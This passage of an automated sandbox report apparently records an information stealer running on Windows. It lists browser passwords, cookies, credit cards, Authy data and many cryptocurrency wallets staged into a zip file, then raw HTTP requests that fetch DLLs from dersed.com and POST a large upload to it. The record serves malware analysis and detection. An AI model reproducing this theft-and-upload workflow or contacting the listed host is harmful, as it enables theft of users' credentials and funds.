- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MultiDoge\\\n",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Zcash\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DashCore\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\GoldCoinGLD\\\n",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IOCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\JAXX\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\screenshot.jpg",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\US_00000000-0000-0000-0000-0000000000009253538962.zip",
- "\\Device\\LanmanDatagramReceiver",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\426A.tmp",
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\cookie_list.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\information.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\passwords.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\screenshot.jpg",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft\\Authy",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DashCore",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectronCash",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectrumLTC",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Ethereum",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\GoldCoinGLD",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IOCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\JAXX",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MultiDoge",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Zcash",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\US_00000000-0000-0000-0000-0000000000009253538962.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\211F1106-53AB-4021-868B-2F49FACAB8E4",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\D7A509EA-AB99-4E2A-B99E-04EE4FF35A33",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\6E5C69F1-55AA-4A7A-B970-656893D7C708",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\DCEB3BF5-151E-4025-A595-D330A9AC667A",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\211F1106-53AB-4021-868B-2F49FACAB8E4\\data",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\D7A509EA-AB99-4E2A-B99E-04EE4FF35A33\\data",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\6E5C69F1-55AA-4A7A-B970-656893D7C708\\data"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "dersed.com",
- "answers":
- "data": "104.200.67.209",
- "type": "A"
- "type": "A",
- "request": "ip-api.com",
- "answers":
- "data": "72.11.140.50",
- "type": "A"
- "data": "66.212.29.250",
- "type": "A"
- * Domains:
- "ip": "104.200.67.209",
- "domain": "dersed.com"
- "ip": "72.11.140.50",
- "domain": "ip-api.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://dersed.com/288",
- "user-agent": "",
- "method": "POST",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/288",
- "data": "POST /288 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/freebl3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/freebl3.dll",
- "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/mozglue.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/mozglue.dll",
- "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/msvcp140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/msvcp140.dll",
- "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/nss3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/nss3.dll",
- "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/softokn3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/softokn3.dll",
- "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/vcruntime140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/vcruntime140.dll",
- "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://ip-api.com/line/",
- "user-agent": "",
- "method": "POST",
- "host": "ip-api.com",
- "version": "1.1",
- "path": "/line/",
- "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/",
- "user-agent": "",
- "method": "POST",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/",
- "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40398\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- "country_name": "United States",
- "ip": "72.11.140.50",
- "inaddrarpa": "",
- "hostname": "ip-api.com"
- "country_name": "United States",
- "ip": "104.200.67.209",
- "inaddrarpa": "",
- "hostname": "dersed.com"
- * Network Communication - IRC: